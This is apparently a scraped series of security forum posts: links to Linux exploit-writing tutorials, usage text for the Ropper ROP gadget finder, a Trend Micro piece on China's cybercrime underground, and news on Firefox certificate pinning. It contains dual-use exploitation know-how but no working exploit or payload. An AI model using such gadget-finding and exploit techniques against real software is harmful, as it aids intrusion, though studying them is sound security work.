Home - MSDN Blogs Hardware and Driver Developer Blogs Support and community for Windows hardware developers Developer Newsgroups • microsoft.public.development.device.drivers • microsoft.public.win32.programmer.kernel • microsoft.public.windbg KernelmodeInfo Blog CURRENT_IRQL j00ru//vx tech blog Coding, reverse engineering, OS internals Blog j00ru//vx tech blog Nynaeve Nynaeve DumpAnalysis Blog Software Diagnostics Institute | Structural and Behavioral Patterns for Software Diagnostics, Forensics and Prognostics. Software Diagnostics Library. Analyze -v Blog http://analyze-v.com/ Instant Online Crash Dump Analysis Instant Online Crash Analysis Winsock Kernel (WSK) Winsock Kernel (Windows Drivers) Transport Driver Interface (TDI) _ Network Driver Interface Specification (NDIS) The NDIS blog - Site Home - MSDN Blogs System Internals System Internals (Windows Drivers) Driver development needs too many time patience and experience to be fully understood, in my opinion the best approach remains LbD ( Learning by Doing ) so, read, study and develop as many experience you build less BSODs and "trange behavior" you will obtain See you to the next post, Giuseppe 'Evilcry' Bonfa Sursa: KernelMode.info • View topic - Device Driver Development for Beginners - Reloaded
-
Packet Storm Security Linux Exploit Writing Linux Exploit Writing Tutorial Part 1 Quote: [TABLE=width: 100%] [TR] [TD=class: alt2] This whitepaper is the Linux Exploit Writing Tutorial Part 1 - Stack Overflows. [/TD] [/TR] [/TABLE] Linux Exploit Writing Tutorial Part 2 Quote: [TABLE=width: 100%] [TR] [TD=class: alt2] This whitepaper is the Linux Exploit Writing Tutorial Part 2 - Stack Overflow ASLR bypass using ret2reg instruction from vulnerable_1. [/TD] [/TR] [/TABLE] Linux Exploit Writing Tutorial Part 3 Quote: [TABLE=width: 100%] [TR] [TD=class: alt2] This whitepaper is the Linux Exploit Writing Tutorial Part 3 - ret2libc. [/TD] [/TR] [/TABLE] Linux Exploit Development Part 2 Rev 2 Linux Exploit Writing Tutorial Part 3 Rev 2 Code: Linux Exploit Writing Tutorial Part 1 ? Packet Storm Linux Exploit Writing Tutorial Part 2 ? Packet Storm Linux Exploit Development Part 2 Rev 2 ? Packet Storm Linux Exploit Writing Tutorial Part 3 ? Packet Storm Linux Exploit Writing Tutorial Part 3 Revision 2 ? Packet Storm Sursa: EXETOOLS FORUM
-
Nu suntem hipsteri cu Apple. Bine, doar @aelius e .
-
Latest Firefox version adds protection against rogue SSL certificates
Nytro replied to Nytro's topic in Stiri securitate
E bun bre. SSL pinning = hardcoded RootCA/Server certificate. Asta inseamna ca previne Man in the Middle chiar si cu RootCA instalat local (telefon sau calculator). -
[h=1]Ropper – rop gadget finder and binary information tool [/h] With ropper you can show information about files in different file formats and you can search for gadgets to build rop chains for different architectures. For disassembly ropper uses the awesome Capstone Framework. Ropper was inspired by ROPgadget, but should be more than a gadgets finder. So it is possible to show information about a binary like header, segments, sections etc. Furthermore it is possible to edit the binaries and edit the header fields. Until now you can set the aslr and nx flags. usage: ropper.py [-h] [-v] [--console] [-f <file>] [-i] [-e] [--imagebase] [-c] [-s] [-S] [--imports] [--symbols] [--set <option>] [--unset <option>] [-I <imagebase>] [-p] [-j <reg>] [--depth <n bytes>] [--search <regex>] [--filter <regex>] [--opcode <opcode>] [--type <type>] With ropper you can show information about files in different file formats and you can search for gadgets to build rop chains for different architectures. supported filetypes: ELF PE supported architectures: x86 x86_64 MIPS optional arguments: -h, --help show this help message and exit -v, --version Print version --console Starts interactive commandline -f <file>, --file <file> The file to load -i, --info Shows file header [ELF/PE] -e Shows EntryPoint --imagebase Shows ImageBase [ELF/PE] -c, --dllcharacteristics Shows DllCharacteristics [PE] -s, --sections Shows file sections [ELF/PE] -S, --segments Shows file segments [ELF] --imports Shows imports [ELF/PE] --symbols Shows symbols [ELF] --set <option> Sets options. Available options: aslr nx --unset <option> Unsets options. Available options: aslr nx -I <imagebase> Uses this imagebase for gadgets -p, --ppr Searches for 'pop reg; pop reg; ret' instructions [only x86/x86_64] -j <reg>, --jmp <reg> Searches for 'jmp reg' instructions (-j reg[,reg...]) [only x86/x86_64] --depth <n bytes> Specifies the depth of search (default: 10) --search <regex> Searches for gadgets --filter <regex> Filters gadgets --opcode <opcode> Searches for opcodes --type <type> Sets the type of gadgets [rop, jop, all] (default: all) example uses: [Generic] ropper.py ropper.py --file /bin/ls --console [Informations] ropper.py --file /bin/ls --info ropper.py --file /bin/ls --imports ropper.py --file /bin/ls --sections ropper.py --file /bin/ls --segments ropper.py --file /bin/ls --set nx ropper.py --file /bin/ls --unset nx [Gadgets] ropper.py --file /bin/ls --depth 5 ropper.py --file /bin/ls --search "sub eax" ropper.py --file /bin/ls --filter "sub eax" ropper.py --file /bin/ls --opcode ffe4 ropper.py --file /bin/ls --type jop ropper.py --file /bin/ls --ppr ropper.py --file /bin/ls --jmp esp,eax ropper.py --file /bin/ls --type jop [h=2]Download[/h] https://github.com/sashs/Ropper (v1.0.1, 01.09.2014) Sursa: Ropper - rop gadget finder and binary information tool
-
The Chinese Underground In 2013 2:04 am (UTC-7) | by Lion Gu (Senior Threat Researcher) The Chinese underground has continued to grow since we last looked at it. It is still highly profitable, the cost of connectivity and hardware continues to fall, and there are more and more users with poor security precautions in place. In short, it is a good time to be a cybercriminal in China. So long as there is money to be made, more people may be tempted to become online crooks themselves. How can we measure the growth of the Chinese underground economy? We can look at the volume of their communications traffic. Many Chinese cybercriminals talk via groups on the popular Chinese instant messaging application QQ. We have been keeping an eye on these groups since March 2012. By the end of 2013, we had obtained 1.4 million publicly available messages from these groups. The data we gathered helped us determine certain characteristics and developing trends in the Chinese underground economy. First, the number of messages showed that the amount of underground activity in China doubled in the last 10 months of 2013 compared with the same period in 2012. Based on the ID of the senders, we also believe that the number of participants has also doubled in the same period. Cybercriminals are also going where the users are. Many of the malicious goods being sold in the underground economy are targeted at mobile users, as opposed to PC users. A mobile underground economy is emerging in China (something we noted earlier this year), and this part of the underground economy appears to be more attractive and lucrative than other portions. Our latest paper in the Cybercrime Underground Economy Series titled The Chinese Underground In 2013 contains the details of these findings related to QQ, as well as other updates dealing with the Chinese underground. Sursa: The Chinese Underground In 2013 | Security Intelligence Blog | Trend Micro
-
Latest Firefox version adds protection against rogue SSL certificates Firefox 32 has implemented a feature known as certificate key pinning By Jeremy Kirk | IDG News Service Mozilla has added a defense in its latest version of Firefox that would help prevent hackers from intercepting data intended for major online services. The feature, known as certificate key pinning, allows online services to specify which SSL/TLS (Secure Sockets Layer/Transport Security Layer) certificates are valid for their services. The certificates are used to verify a site is legitimate and to encrypt data traffic. The idea is to prevent attacks such as the one that affected Google in 2011, targeting Gmail users. A Dutch certificate authority (CA), Diginotar, was either tricked or hacked and issued a valid SSL certificate that would work for a Google domain. In theory, that allowed the hackers to set up a fake website that looked like Gmail and didn't trigger a browser warning of an invalid SSL certificate. Security experts have long warned that attacks targeting certificate authorities are a threat. Certificate pinning would have halted that kind of attack, as Firefox would have known Diginotar shouldn't have issued a certificate for Google. In Firefox 32, "if any certificate in the verified certificate chain corresponds to one of the known good (pinned) certificates, Firefox displays the lock icon as normal," wrote Sid Stamm, senior manager of security and privacy engineering at Mozilla, on a company blog. "When the root cert for a pinned site does not match one of the known good CAs, Firefox will reject the connection with a pinning error," he continued. The "pins" for the certificates of online services have to be encoded into Firefox. Firefox 32, released this week, supports Mozilla sites and Twitter. Later Firefox releases will support certificate pinning for Google sites, Tor, Dropbox and others, according to a project wiki. Sursa: Latest Firefox version adds protection against rogue SSL certificates | Applications - InfoWorld